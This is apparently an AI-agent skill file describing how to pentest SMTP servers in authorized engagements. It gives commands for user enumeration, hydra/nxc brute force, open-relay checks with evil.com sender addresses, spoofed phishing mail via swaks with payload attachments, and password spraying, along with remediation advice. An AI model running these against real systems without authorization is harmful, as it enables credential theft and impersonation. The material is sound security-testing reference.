pentesting-smtp
$
npx mdskill add xalgord/xalgorix/pentesting-smtp- Default ports: `25/tcp` (MTA-to-MTA), `465/tcp` (SMTPS), `587/tcp` (submission/STARTTLS). - When `nmap`/banner shows `smtp`, `ESMTP`, `Sendmail`, `Postfix`, `Exim`, or `Microsoft ESMTP`. - For testing relay policy, user enumeration, email-spoofing controls (SPF/DKIM/DMARC), and gateway routing.
SKILL.md
.github/skills/pentesting-smtpView on GitHub ↗
---
name: pentesting-smtp
description: Testing SMTP services (default ports 25, 465/SSL, 587/submission) for open relays, user enumeration (VRFY/EXPN/RCPT), NTLM info disclosure, weak/no authentication, SPF/DKIM/DMARC spoofing gaps, Secure Email Gateway bypass, and SMTP smuggling during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- smtp
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting SMTP (ports 25, 465, 587)
## When to Use
- Default ports: `25/tcp` (MTA-to-MTA), `465/tcp` (SMTPS), `587/tcp` (submission/STARTTLS).
- When `nmap`/banner shows `smtp`, `ESMTP`, `Sendmail`, `Postfix`, `Exim`, or `Microsoft ESMTP`.
- For testing relay policy, user enumeration, email-spoofing controls (SPF/DKIM/DMARC), and gateway routing.
## Quick Enumeration
```bash
# Plaintext banner + manual session
nc -vn <IP> 25
# SMTPS / STARTTLS
openssl s_client -crlf -connect <IP>:465 # implicit TLS
openssl s_client -starttls smtp -crlf -connect <IP>:587
# MX discovery
dig +short mx <domain>
# nmap scripts: commands, open-relay, NTLM info
nmap -p25 --script smtp-commands <IP>
nmap -p25 --script smtp-open-relay -v <IP>
nmap -p25 --script smtp-ntlm-info <IP>
```
## Critical: Checks Most Often Missed
- **Open relay** — server forwards mail for arbitrary external sender/recipient. High-impact, frequently missed.
- How to CONFIRM: `nmap -p25 --script smtp-open-relay -v <IP>` reports relaying, or manually `MAIL FROM:<a@evil.com>` + `RCPT TO:<b@external.com>` is accepted.
- **User enumeration without auth** — `VRFY`, `EXPN`, and differential `RCPT TO` responses leak valid accounts.
- How to CONFIRM:
```bash
nc <IP> 25
HELO x
VRFY root # 250 = exists, 550 = unknown
EXPN root
RCPT TO:admin # compare 250 vs 550
smtp-user-enum -M VRFY -U users.txt -t <IP>
```
- **NTLM info disclosure** — `AUTH NTLM` over 587 leaks Windows/domain build info.
- How to CONFIRM: `nmap -p587 --script smtp-ntlm-info <IP>` or send `AUTH NTLM 334` + a Type-1 token in a manual telnet session.
- **Spoofing controls (SPF/DKIM/DMARC) missing or weak** — `p=none`, relaxed alignment, or no SPF lets you spoof the domain.
- How to CONFIRM:
```bash
dig txt <domain> | grep spf
dig 20120113._domainkey.<domain> TXT | grep p=
dig _dmarc.<domain> txt | grep DMARC # p=none/quarantine/reject
```
- **SEG bypass** — if any accepted domain (or `<tenant>.onmicrosoft.com`) has an MX pointing directly at the mail server instead of the Secure Email Gateway, you can deliver mail past inspection.
- How to CONFIRM: `dig +short mx <accepted_domain>` resolves to Exchange Online / origin MTA, not the SEG.
- **SMTP smuggling / Exim STARTTLS+BDAT (GnuTLS UAF)** — protocol-desync and memory-lifetime surfaces on Exim+GnuTLS where `STARTTLS` and `CHUNKING`/`BDAT` are advertised.
## Workflow
### Step 1: Enumerate (version, commands, auth)
```bash
nc -vn <IP> 25
# HELO/EHLO then read advertised features:
EHLO attacker.local # note STARTTLS, AUTH, VRFY, EXPN, SIZE, CHUNKING/BDAT, PIPELINING
nmap -p25 --script smtp-commands,smtp-ntlm-info <IP>
```
### Step 2: User enumeration + auth brute force
```bash
# Username enumeration
smtp-user-enum -M VRFY -U users.txt -t <IP>
smtp-user-enum -M RCPT -U users.txt -t <IP>
nmap --script smtp-enum-users <IP>
msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <IP>; run; exit'
# Auth brute force (when AUTH is required)
hydra -L users.txt -P passwords.txt smtp://<IP>
nxc smtp <IP> -u users.txt -p passwords.txt
```
### Step 3: Exploit / Extract (relay, spoof, deliver)
```bash
# Confirm open relay manually
nc <IP> 25
HELO x
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@external.com>
DATA
Subject: relay test
.
QUIT
# Send a spoofed / phishing message
sendEmail -t to@domain.com -f from@attacker.com -s <IP> -u "Important" -a /tmp/payload.pdf
swaks --to hr@example.local --from ceo@example.local --header "Subject: Resume" \
--body "Please review" --attach @resume.doc --server <IP> # @ embeds file bytes
# Validate spoofing posture
python3 -m pip install checkdmarc && checkdmarc <domain>
```
### Step 4: Post-access / pivot
- Use enumerated valid usernames as inputs for SSH/OWA/VPN password spraying.
- Harvest internal hostnames/IPs from NDN/bounce headers and `MAIL FROM` auto-completion (`MAIL FROM: me` → `me@PRODSERV01...`).
- Detect AV/SEG products from headers (`X-Virus-Scanned`) by sending an EICAR test file.
## Key Concepts
| Concept | Description |
|---------|-------------|
| **Open relay** | MTA forwards mail between arbitrary external parties — abused for spam/phishing. |
| **VRFY / EXPN / RCPT enum** | Verb responses differentiate valid vs invalid local accounts. |
| **SPF** | DNS TXT listing authorized sender IPs; `~all` (softfail) / `-all` (fail) qualifiers. |
| **DKIM** | DNS-published public key validates a cryptographic signature on outbound mail. |
| **DMARC** | Policy (`p=none/quarantine/reject`) + alignment tying SPF/DKIM to the From domain. |
| **SEG bypass** | MX of an accepted domain pointing at the origin MTA skips gateway inspection. |
| **SMTP smuggling** | Desync of end-of-data parsing between hops to inject a second message past controls. |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `smtp-commands`, `smtp-open-relay`, `smtp-ntlm-info`, `smtp-enum-users`. |
| **nc / openssl s_client** | Manual SMTP/SMTPS sessions, relay and enum testing. |
| **smtp-user-enum** | VRFY/EXPN/RCPT user enumeration. |
| **swaks / sendEmail** | Crafting and sending spoofed/phishing mail with attachments. |
| **hydra / netexec (nxc)** | SMTP AUTH brute force / spraying. |
| **Metasploit** | `scanner/smtp/smtp_enum`, `scanner/smtp/smtp_version`. |
| **checkdmarc / mailspoof / magicspoofing** | Automated SPF/DKIM/DMARC misconfiguration discovery. |
## Common Scenarios
### Scenario 1: Open relay enables phishing
`nmap --script smtp-open-relay` confirms the MTA relays for external recipients. The tester sends a spoofed internal-looking email via `swaks` to demonstrate phishing capability against staff.
### Scenario 2: User enumeration → password spray
`VRFY`/`RCPT` differences reveal valid mailbox names. The list feeds an OWA/VPN password spray, landing one valid corporate credential.
### Scenario 3: DMARC p=none lets domain spoofing
`dig _dmarc.<domain>` returns `p=none`. With no enforcement, `swaks --from ceo@<domain>` is delivered to inboxes, proving impersonation risk.
## Output Format
```
## SMTP Finding
**Service**: SMTP
**Port**: 25/tcp (Postfix)
**Severity**: High
**Finding**: Open mail relay + missing DMARC enforcement
**Evidence**:
- nmap smtp-open-relay: "Server is an open relay"
- manual MAIL FROM:<a@evil.com> / RCPT TO:<b@external.com> accepted (250)
- dig _dmarc.<domain>: "v=DMARC1; p=none"
**Impact**: Attackers can relay spam/phishing through the server and spoof the organization's domain, damaging reputation and enabling social engineering.
**Recommendation**:
1. Restrict `mynetworks`/relay to trusted hosts only; never 0.0.0.0/0.
2. Disable VRFY/EXPN; normalize RCPT responses.
3. Publish strict SPF (`-all`), DKIM, and DMARC (`p=reject`, strict alignment).
4. Ensure all accepted-domain MX records route through the Secure Email Gateway.
```